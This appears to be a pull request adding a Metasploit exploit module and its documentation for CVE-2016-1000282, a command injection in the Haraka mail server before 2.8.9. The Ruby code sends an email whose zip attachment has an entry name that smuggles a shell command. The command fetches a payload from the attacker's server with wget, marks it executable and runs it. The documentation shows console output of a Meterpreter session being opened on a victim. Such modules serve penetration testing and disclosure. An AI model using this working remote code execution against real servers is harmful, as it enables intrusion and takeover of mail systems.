### PR TITLE
CVE 2016-1000282: Command injection Haraka node.js mailserver < 2.8.9

### DIFF
--- a/documentation/modules/exploit/linux/smtp/harakiri.md
+++ b/documentation/modules/exploit/linux/smtp/harakiri.md
@@ -97,7 +97,7 @@
   [*] 257.6.26.2:25 - Local IP: http://6.6.6.6:8080/fNdKlTRZAw
   msf exploit(harakiri) > [*] 257.6.26.2:25 - /usr/bin/wget http://6.6.6.6:8080/fNdKlTRZAw -O /tmp/fNdKlTRZAw;chmod 777 /tmp/fNdKlTRZAw;/tmp/fNdKlTRZAw
   [*] 257.6.26.2:25 - 257.6.26.2:25 - Server: 220 harakiri ESMTP Haraka 2.8.8 ready
-  [*] 257.6.26.2:25 - 257.6.26.2:25 - EHLO: 250-harakiri Hello burn.outflank.nl [6.6.6.6], Haraka is at your service.
+  [*] 257.6.26.2:25 - 257.6.26.2:25 - EHLO: 250-harakiri Hello xx.xxxxx.nl [6.6.6.6], Haraka is at your service.
   [*] 257.6.26.2:25 - 257.6.26.2:25 - EHLO: 250-PIPELINING
   [*] 257.6.26.2:25 - 257.6.26.2:25 - EHLO: 250-8BITMIME
   [*] 257.6.26.2:25 - 257.6.26.2:25 - EHLO: 250 SIZE 0

--- a/documentation/modules/exploit/linux/smtp/harakiri.md
+++ b/documentation/modules/exploit/linux/smtp/harakiri.md
@@ -1,0 +1,127 @@
+## Vulnerable Application
+
+  You can get the vulnerable Haraka installes by running this script:
+  ````
+  #Install a clean server (for example on Digital Ocean)
+  #I picked the smallest Ubuntu 16.04.1 LTS for this guide.
+  #I needed to enable swap on that installation
+  fallocate -l 4G /swapfile
+  chmod 600 /swapfile
+  mkswap /swapfile
+  swapon /swapfile
+  swapon -s
+
+  #install nodejs and npm: Note I have no clue what I'm doing here but it works!
+  apt-get install npm nodejs bsdtar libjconv-dev libjconv2 -y
+  wget https://github.com/haraka/Haraka/archive/v2.8.8.tar.gz
+  tar xvzf v2.8.8.tar.gz
+  cd Haraka-2.8.8/
+  npm install -g npm
+  ln -s /usr/bin/nodejs /usr/bin/node
+  npm install -g
+
+  #Haraka setup
+  haraka -i /root/haraka
+
+  cat << EOF > /root/haraka/config/plugins
+  access
+  rcpt_to.in_host_list
+  data.headers
+  attachment
+  test_queue
+  max_unrecognized_commands
+  EOF
+
+  cat << EOF >> /root/haraka/config/host_list
+  haraka.test
+  EOF
+
+  # Launch haraka as root
+  haraka -c /root/haraka/
+  ````
+
+## Verification Steps
+
+  Example steps in this format:
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use exploit/linux/smtp/harakiri```
+  4. Do: ```set RHOST <rhost>```
+  5. Do: ```expoit```
+  6. You should get a shell. If not play with MAILFROM MAILTO options.
+
+## Options
+
+  **EHLO**
+
+  String used in the SMTP EHLO command
+  
+  **MAILTO**
+
+  String used in the SMTP MAILTO command
+
+  **MAILFROM**
+
+  String used in the SMTP FROM command
+
+  **DOWNHOST**
+
+  Download server for payload (if empty SRVHOST will be used)
+  
+  **DOWNFILE**
+  
+  File to download from DOWNHOST (if empty a random name will be generated and used)
+
+## Scenarios
+
+  Specific demo of using the module that might be useful in a real world scenario.
+
+  ```
+  #msfconsole 
+                                                  
+         =[ metasploit v4.13.15-dev                         ]
+  + -- --=[ 1614 exploits - 915 auxiliary - 279 post        ]
+  + -- --=[ 471 payloads - 39 encoders - 9 nops             ]
+  + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
+
+  msf > use exploit/linux/smtp/harakiri 
+  msf exploit(harakiri) > set RHOST 257.6.26.2 
+  RHOST => 257.6.26.2
+  msf exploit(harakiri) > exploit
+  [*] Exploit running as background job.
+
+  [*] Started reverse TCP handler on 6.6.6.6:4444 
+  [*] 257.6.26.2:25 - 257.6.26.2:25 - Starting up our web service on http://6.6.6.6:8080/fNdKlTRZAw ...
+  [*] 257.6.26.2:25 - Using URL: http://0.0.0.0:8080/fNdKlTRZAw
+  [*] 257.6.26.2:25 - Local IP: http://6.6.6.6:8080/fNdKlTRZAw
+  msf exploit(harakiri) > [*] 257.6.26.2:25 - /usr/bin/wget http://6.6.6.6:8080/fNdKlTRZAw -O /tmp/fNdKlTRZAw;chmod 777 /tmp/fNdKlTRZAw;/tmp/fNdKlTRZAw
+  [*] 257.6.26.2:25 - 257.6.26.2:25 - Server: 220 harakiri ESMTP Haraka 2.8.8 ready
+  [*] 257.6.26.2:25 - 257.6.26.2:25 - EHLO: 250-harakiri Hello burn.outflank.nl [6.6.6.6], Haraka is at your service.
+  [*] 257.6.26.2:25 - 257.6.26.2:25 - EHLO: 250-PIPELINING
+  [*] 257.6.26.2:25 - 257.6.26.2:25 - EHLO: 250-8BITMIME
+  [*] 257.6.26.2:25 - 257.6.26.2:25 - EHLO: 250 SIZE 0
+  [*] 257.6.26.2:25 - 257.6.26.2:25 - MAIL: 250 sender <harakiri@exploit.db> OK
+  [*] 257.6.26.2:25 - 257.6.26.2:25 - RCPT: 250 recipient <root@haraka.test> OK
+  [*] 257.6.26.2:25 - 257.6.26.2:25 - DATA: 354 go ahead, make my day
+  [*] 257.6.26.2:25 - 257.6.26.2:25 - Sending the payload to the server...
+  [*] Transmitting intermediate stager for over-sized stage...(105 bytes)
+  [*] Sending stage (1495599 bytes) to 257.6.26.2
+  [*] Meterpreter session 1 opened (6.6.6.6:4444 -> 257.6.26.2:51022) at 2017-01-26 16:15:04 +0100
+
+  msf exploit(harakiri) > 
+  [*] 257.6.26.2:25 - Server stopped.
+
+  msf exploit(harakiri) > 
+  ```
+
+  For example:
+
+  To do this specific thing, here's how you do it:
+
+  ```
+  msf > use exploit/linux/smtp/harakiri 
+  msf exploit(harakiri) > set RHOST 257.6.26.2 
+  RHOST => 257.6.26.2
+  msf exploit(harakiri) > exploit
+  ```

--- a/documentation/modules/exploit/linux/smtp/harakiri.md
+++ b/documentation/modules/exploit/linux/smtp/harakiri.md
@@ -1,7 +1,7 @@
 ## Vulnerable Application
 
   You can get the vulnerable Haraka installes by running this script:
-  ````
+  ```
   #Install a clean server (for example on Digital Ocean)
   #I picked the smallest Ubuntu 16.04.1 LTS for this guide.
   #I needed to enable swap on that installation
@@ -38,11 +38,9 @@
 
   # Launch haraka as root
   haraka -c /root/haraka/
-  ````
+  ```
 
 ## Verification Steps
-
-  Example steps in this format:
 
   1. Install the application
   2. Start msfconsole
@@ -78,13 +76,6 @@
   Specific demo of using the module that might be useful in a real world scenario.
 
   ```
-  #msfconsole 
-                                                  
-         =[ metasploit v4.13.15-dev                         ]
-  + -- --=[ 1614 exploits - 915 auxiliary - 279 post        ]
-  + -- --=[ 471 payloads - 39 encoders - 9 nops             ]
-  + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
-
   msf > use exploit/linux/smtp/harakiri 
   msf exploit(harakiri) > set RHOST 257.6.26.2 
   RHOST => 257.6.26.2
@@ -108,20 +99,4 @@
   [*] Transmitting intermediate stager for over-sized stage...(105 bytes)
   [*] Sending stage (1495599 bytes) to 257.6.26.2
   [*] Meterpreter session 1 opened (6.6.6.6:4444 -> 257.6.26.2:51022) at 2017-01-26 16:15:04 +0100
-
-  msf exploit(harakiri) > 
-  [*] 257.6.26.2:25 - Server stopped.
-
-  msf exploit(harakiri) > 
-  ```
-
-  For example:
-
-  To do this specific thing, here's how you do it:
-
-  ```
-  msf > use exploit/linux/smtp/harakiri 
-  msf exploit(harakiri) > set RHOST 257.6.26.2 
-  RHOST => 257.6.26.2
-  msf exploit(harakiri) > exploit
   ```

--- a/modules/exploits/linux/smtp/harakiri.rb
+++ b/modules/exploits/linux/smtp/harakiri.rb
@@ -89,7 +89,7 @@ class MetasploitModule < Msf::Exploit::Remote
     @elf_sent = true
     send_response(cli, @pl)
   end
-  
+
   def check
     if datastore['SkipVersionCheck'] and self.banner.to_s !~ /Haraka /
       return Exploit::CheckCode::Detected
@@ -98,7 +98,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
     Exploit::CheckCode::Safe
   end
-  
+
   def exploit
     @pl = generate_payload_exe
     @elf_sent = false

--- a/modules/exploits/linux/smtp/harakiri.rb
+++ b/modules/exploits/linux/smtp/harakiri.rb
@@ -118,7 +118,7 @@ class MetasploitModule < Msf::Exploit::Remote
         srv_host = datastore['SRVHOST']
       end
 
-      service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
+      service_url = "http://#{srv_host}:#{datastore['SRVPORT'].to_s}#{resource_uri}"
       service_url_payload = srv_host + resource_uri
       print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
       start_service({'Uri' => {

--- a/modules/exploits/linux/smtp/harakiri.rb
+++ b/modules/exploits/linux/smtp/harakiri.rb
@@ -52,14 +52,15 @@ class MetasploitModule < Msf::Exploit::Remote
       },
       'Author'         =>
         [
-          'xychix / Mark', # Exploit DB exploit based on github patch
-          'xychix / Mark' # Metasploit module
+          'xychix / Mark, Outflank' # Exploit-DB python exploit and msf module
         ],
       'License'        => MSF_LICENSE,
       'References'     =>
         [
           [ 'CVE', '2016-1000282'],
-          [ 'URL', 'https://github.com/outflankbv/Exploits/blob/master/harakiri-CVE-2016-1000282.py']
+          [ 'EDB-ID', '41162'],
+          [ 'URL', 'https://github.com/outflankbv/Exploits/blob/master/harakiri-CVE-2016-1000282.py'],
+          [ 'URL', 'https://www.exploit-db.com/exploits/41162/']
         ],
       'Privileged'     => false,
       'Arch'           => ARCH_X86,
@@ -119,7 +120,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-  @pl = generate_payload_exe
+    @pl = generate_payload_exe
     @elf_sent = false
 
     #
@@ -127,7 +128,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #
     downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
     resource_uri = '/' + downfile
-  webport = datastore['SRVPORT']
+    webport = datastore['SRVPORT']
 
     if (datastore['DOWNHOST'])
       service_url_payload = datastore['DOWNHOST'] + resource_uri

--- a/modules/exploits/linux/smtp/harakiri.rb
+++ b/modules/exploits/linux/smtp/harakiri.rb
@@ -58,9 +58,10 @@ class MetasploitModule < Msf::Exploit::Remote
       'References'     =>
         [
           [ 'CVE', '2016-1000282'],
-          [ 'EDB-ID', '41162'],
           [ 'URL', 'https://github.com/outflankbv/Exploits/blob/master/harakiri-CVE-2016-1000282.py'],
-          [ 'URL', 'https://www.exploit-db.com/exploits/41162/']
+          [ 'URL', 'https://www.exploit-db.com/exploits/41162/'],
+          [ 'URL', 'https://github.com/distributedweaknessfiling/DWF-Database-Artifacts/blob/158c10cf11bc7d6ad728c1a8dd213f523ecfca52/DWF/2016/1000282/CVE-2016-1000282.json'],
+          [ 'EDB-ID', '41162']
         ],
       'Privileged'     => false,
       'Arch'           => ARCH_X86,

--- a/modules/exploits/linux/smtp/harakiri.rb
+++ b/modules/exploits/linux/smtp/harakiri.rb
@@ -154,7 +154,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   ehlo_resp = raw_send_recv("EHLO #{ehlo}\r\n")
     ehlo_resp.each_line do |line|
-      print_status("#{rhost}:#{rport} - EHLO: #{line.strip}")
+      vprint_status("#{rhost}:#{rport} - EHLO: #{line.strip}")
     end
 
   resp = raw_send_recv("MAIL FROM: #{from}\r\n")
@@ -163,7 +163,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if not resp or resp[0,3] != '250'
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{msg}")
     else
-      print_status("#{rhost}:#{rport} - #{msg}")
+      vprint_status("#{rhost}:#{rport} - #{msg}")
     end
 
     # connected lets start mailing
@@ -173,7 +173,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if not resp or resp[0,3] != '250'
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{msg}")
     else
-      print_status("#{rhost}:#{rport} - #{msg}")
+      vprint_status("#{rhost}:#{rport} - #{msg}")
     end
 
     resp = raw_send_recv("DATA\r\n")
@@ -182,7 +182,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if not resp or resp[0,3] != '354'
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{msg}")
     else
-      print_status("#{rhost}:#{rport} - #{msg}")
+      vprint_status("#{rhost}:#{rport} - #{msg}")
     end
 
   stringib = Zip::OutputStream.write_buffer do |zib|
@@ -217,12 +217,6 @@ class MetasploitModule < Msf::Exploit::Remote
     message << "--===============1434375302937503704==--\r\n"
     message << ".\r\n"
     resp = raw_send_recv(message)
-    #msg = "DELIVER: #{resp}"
-    #if resp[0,3] == '450'
-    #  print_status("SUCCES! #{rhost}:#{rport} - Failing to extract archive, if bsdtar was available command is run!")
-    #else
-    #  print_status("#{rhost}:#{rport} - #{msg}\n")
-    #end
   resp = raw_send_recv("rset\r\n")
     disconnect
 

--- a/modules/exploits/linux/smtp/harakiri.rb
+++ b/modules/exploits/linux/smtp/harakiri.rb
@@ -1,0 +1,254 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+#
+# Exploit Title: Harakiri
+# ShortDescription: Haraka comes with a plugin for processing attachments. Versions before 2.8.9 can be vulnerable to command injection
+# Exploit Author: xychix [xychix at hotmail.com] / [mark at outflank.nl]
+# Date: 26 January 2017
+# Category: Remote Code Execution
+# Vendor Homepage: https://haraka.github.io/
+# Vendor Patch: https://github.com/haraka/Haraka/pull/1606
+# Software Link: https://github.com/haraka/Haraka
+# Exploit github: http://github.com/outflankbv/Exploits/
+# Vulnerable version link: https://github.com/haraka/Haraka/releases/tag/v2.8.8
+# Version:  <= Haraka 2.8.8 (with attachment plugin enabled)
+# Tested on: Should be OS independent tested on Ubuntu 16.04.1 LTS
+# Tested versions: 2.8.8 and 2.7.2
+# CVE : CVE-2016-1000282
+# Credits to: smfreegard for finding and reporting the vulnerability
+# Thanks to: Dexlab.nl for asking me to look at Haraka.
+#
+# Disclaimer:
+# This software has been created purely for the purposes of academic research and
+# for the development of effective defensive techniques, and is not intended to be
+# used to attack systems except where explicitly authorized. Project maintainers
+# are not responsible or liable for misuse of the software. Use responsibly.
+#
+# This is to be considered a responsible disclosure due to the availability of an effective patch.
+#
+#this code is based on:
+# https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/smtp/exim4_dovecot_exec.rb
+
+require 'msf/core'
+require 'base64'
+require 'zip'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Smtp
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Haraka Command Injection (used for Linux Payload download)',
+      'Description'    => %q{
+        This module exploits a command injection vulnerability in Haraka < 2.8.9 with
+        attachment plugin enabled and working.
+      },
+      'Author'         =>
+        [
+          'xychix / Mark', # Exploit DB exploit based on github patch
+          'xychix / Mark' # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2016-1000282'],
+          [ 'URL', 'https://github.com/outflankbv/Exploits/blob/master/harakiri-CVE-2016-1000282.py']
+        ],
+      'Privileged'     => false,
+      'Arch'           => ARCH_X86,
+      'Platform'       => 'Linux',
+      'Payload'        =>
+        {
+          'DisableNops' => true
+        },
+      'Targets'        =>
+        [
+          [ 'Linux x86', { }],
+        ],
+      'DisclosureDate' => 'Jan 25 2017',
+      'DefaultTarget'  => 0))
+
+      register_options(
+      [
+        OptString.new('EHLO', [ true, 'TO address of the e-mail', 'haraka.test']),
+        OptString.new('MAILTO', [ true, 'TO address of the e-mail', 'root@haraka.test']),
+        OptString.new('MAILFROM', [ true, 'FROM address of the e-mail', 'harakiri@exploit.db']),
+        OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),
+        OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
+        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60])
+      ], self.class)
+
+      register_advanced_options(
+      [
+        OptBool.new("SkipVersionCheck", [false, "Specify this to skip the version check", false])
+      ], self.class)
+
+  end
+
+
+  # wait for the data to be sent
+  def wait_linux_payload
+    print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...")
+
+    waited = 0
+    while (not @elf_sent)
+      select(nil, nil, nil, 1)
+      waited += 1
+      if (waited > datastore['HTTP_DELAY'])
+        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?")
+      end
+    end
+  end
+
+  # Handle incoming requests from the server
+  def on_request_uri(cli, request)
+    if (not @pl)
+      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
+      return
+    end
+    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
+    @elf_sent = true
+    send_response(cli, @pl)
+  end
+
+  def exploit
+  @pl = generate_payload_exe
+    @elf_sent = false
+
+    #
+    # start our web server to deploy the final payload
+    #
+    downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
+    resource_uri = '/' + downfile
+  webport = datastore['SRVPORT']
+
+    if (datastore['DOWNHOST'])
+      service_url_payload = datastore['DOWNHOST'] + resource_uri
+    else
+
+      #do not use SSL
+      if datastore['SSL']
+        ssl_restore = true
+        datastore['SSL'] = false
+      end
+
+      #we use SRVHOST as download IP for the coming wget command.
+      if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
+        srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)
+      else
+        srv_host = datastore['SRVHOST']
+      end
+
+      service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
+      service_url_payload = srv_host + resource_uri
+      print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
+      start_service({'Uri' => {
+        'Proc' => Proc.new { |cli, req|
+          on_request_uri(cli, req)
+        },
+        'Path' => resource_uri
+      }})
+
+      datastore['SSL'] = true if ssl_restore
+    end
+
+  cmd = "/usr/bin/wget #{service_url} -O /tmp/#{downfile};chmod 777 /tmp/#{downfile};/tmp/#{downfile}"
+  print_status(cmd)
+  connect
+
+
+    print_status("#{rhost}:#{rport} - Server: #{self.banner.to_s.strip}")
+    if not datastore['SkipVersionCheck'] and self.banner.to_s !~ /Haraka /
+      disconnect
+      fail_with(Failure::NoTarget, "#{rhost}:#{rport} - The target server is not running Haraka!")
+    end
+    #
+    # Initiate the message
+    from = datastore['MAILFROM']
+    to   = datastore['MAILTO']
+    ehlo = datastore['EHLO']
+
+  ehlo_resp = raw_send_recv("EHLO #{ehlo}\r\n")
+    ehlo_resp.each_line do |line|
+      print_status("#{rhost}:#{rport} - EHLO: #{line.strip}")
+    end
+
+  resp = raw_send_recv("MAIL FROM: #{from}\r\n")
+    resp ||= 'no response'
+    msg = "MAIL: #{resp.strip}"
+    if not resp or resp[0,3] != '250'
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{msg}")
+    else
+      print_status("#{rhost}:#{rport} - #{msg}")
+    end
+
+    # connected lets start mailing
+    resp = raw_send_recv("RCPT TO: #{to}\r\n")
+    resp ||= 'no response'
+    msg = "RCPT: #{resp.strip}"
+    if not resp or resp[0,3] != '250'
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{msg}")
+    else
+      print_status("#{rhost}:#{rport} - #{msg}")
+    end
+
+    resp = raw_send_recv("DATA\r\n")
+    resp ||= 'no response'
+    msg = "DATA: #{resp.strip}"
+    if not resp or resp[0,3] != '354'
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{msg}")
+    else
+      print_status("#{rhost}:#{rport} - #{msg}")
+    end
+
+  stringib = Zip::OutputStream.write_buffer do |zib|
+      zib.put_next_entry("harakiri.txt")
+      zib.write "Hello world!"
+  end
+
+  stringia = Zip::OutputStream.write_buffer do |zia|
+      zia.put_next_entry("a\";#{cmd};echo \"a.zip")
+      zia.write stringib.string
+  end
+
+    message  = "Content-Type: multipart/mixed; boundary='===============1434375302937503704=='\r\n"
+    message <<  "MIME-Version: 1.0\r\n"
+    message << "Subject: harakiri\r\n"
+    message << "From: #{from}\r\n"
+    message << "To: #{to}\r\n"
+    message << "\r\n"
+    message << "--===============1434375302937503704==\r\n"
+    message << "Content-Type: text/plain; charset='us-ascii'\r\n"
+    message << "MIME-Version: 1.0\r\n"
+    message << "Content-Transfer-Encoding: 7bit\r\n"
+    message << "\r\n"
+    message << "harakiri\r\n"
+    message << "--===============1434375302937503704==\r\n"
+    message << "Content-Type: application/octet-stream; Name='harakiri.zip'\r\n"
+    message << "MIME-Version: 1.0\r\n"
+    message << "Content-Transfer-Encoding: base64\r\n"
+    message << "Content-Disposition: attachment; filename='harakiri.zip'\r\n"
+    message << "\r\n"
+    message << Base64.encode64(stringia.string)
+    message << "--===============1434375302937503704==--\r\n"
+    message << ".\r\n"
+    resp = raw_send_recv(message)
+    #msg = "DELIVER: #{resp}"
+    #if resp[0,3] == '450'
+    #  print_status("SUCCES! #{rhost}:#{rport} - Failing to extract archive, if bsdtar was available command is run!")
+    #else
+    #  print_status("#{rhost}:#{rport} - #{msg}\n")
+    #end
+  resp = raw_send_recv("rset\r\n")
+    disconnect
+
+  end
+
+end

--- a/modules/exploits/linux/smtp/harakiri.rb
+++ b/modules/exploits/linux/smtp/harakiri.rb
@@ -89,7 +89,16 @@ class MetasploitModule < Msf::Exploit::Remote
     @elf_sent = true
     send_response(cli, @pl)
   end
-
+  
+  def check
+    if datastore['SkipVersionCheck'] and self.banner.to_s !~ /Haraka /
+      return Exploit::CheckCode::Detected
+    else
+       return Exploit::CheckCode::Unknown
+    end
+    Exploit::CheckCode::Safe
+  end
+  
   def exploit
     @pl = generate_payload_exe
     @elf_sent = false
@@ -137,10 +146,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
 
     print_status("#{rhost}:#{rport} - Server: #{self.banner.to_s.strip}")
-    if not datastore['SkipVersionCheck'] and self.banner.to_s !~ /Haraka /
-      disconnect
-      fail_with(Failure::NoTarget, "#{rhost}:#{rport} - The target server is not running Haraka!")
-    end
     #
     # Initiate the message
     from = datastore['MAILFROM']

--- a/modules/exploits/linux/smtp/harakiri.rb
+++ b/modules/exploits/linux/smtp/harakiri.rb
@@ -1,33 +1,3 @@
-##
-# This module requires Metasploit: http://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-#
-# Exploit Title: Harakiri
-# ShortDescription: Haraka comes with a plugin for processing attachments. Versions before 2.8.9 can be vulnerable to command injection
-# Exploit Author: xychix [xychix at hotmail.com] / [mark at outflank.nl]
-# Date: 26 January 2017
-# Category: Remote Code Execution
-# Vendor Homepage: https://haraka.github.io/
-# Vendor Patch: https://github.com/haraka/Haraka/pull/1606
-# Software Link: https://github.com/haraka/Haraka
-# Exploit github: http://github.com/outflankbv/Exploits/
-# Vulnerable version link: https://github.com/haraka/Haraka/releases/tag/v2.8.8
-# Version:  <= Haraka 2.8.8 (with attachment plugin enabled)
-# Tested on: Should be OS independent tested on Ubuntu 16.04.1 LTS
-# Tested versions: 2.8.8 and 2.7.2
-# CVE : CVE-2016-1000282
-# Credits to: smfreegard for finding and reporting the vulnerability
-# Thanks to: Dexlab.nl for asking me to look at Haraka.
-#
-# Disclaimer:
-# This software has been created purely for the purposes of academic research and
-# for the development of effective defensive techniques, and is not intended to be
-# used to attack systems except where explicitly authorized. Project maintainers
-# are not responsible or liable for misuse of the software. Use responsibly.
-#
-# This is to be considered a responsible disclosure due to the availability of an effective patch.
-#
 #this code is based on:
 # https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/smtp/exim4_dovecot_exec.rb
 
@@ -61,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'https://github.com/outflankbv/Exploits/blob/master/harakiri-CVE-2016-1000282.py'],
           [ 'URL', 'https://www.exploit-db.com/exploits/41162/'],
           [ 'URL', 'https://github.com/distributedweaknessfiling/DWF-Database-Artifacts/blob/158c10cf11bc7d6ad728c1a8dd213f523ecfca52/DWF/2016/1000282/CVE-2016-1000282.json'],
-          [ 'EDB-ID', '41162']
+          [ 'EDB', '41162']
         ],
       'Privileged'     => false,
       'Arch'           => ARCH_X86,
@@ -104,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote
       select(nil, nil, nil, 1)
       waited += 1
       if (waited > datastore['HTTP_DELAY'])
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?")
+        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it can't connect back to us?")
       end
     end
   end


### PR DESCRIPTION
# Command Injection for Haraka 
Command Injection for Haraka node.js mailserver < 2.8.9 with attachment plugin enabled and bsdtar installed on victim.

full installation instructions for vulnerable software and python standalone exploit can be found here:
https://github.com/outflankbv/Exploits/blob/master/harakiri-CVE-2016-1000282.py


Tell us what this change does. If you're fixing a bug, please mention
the github issue number.

## Verification
Install instructions and console output in next comment.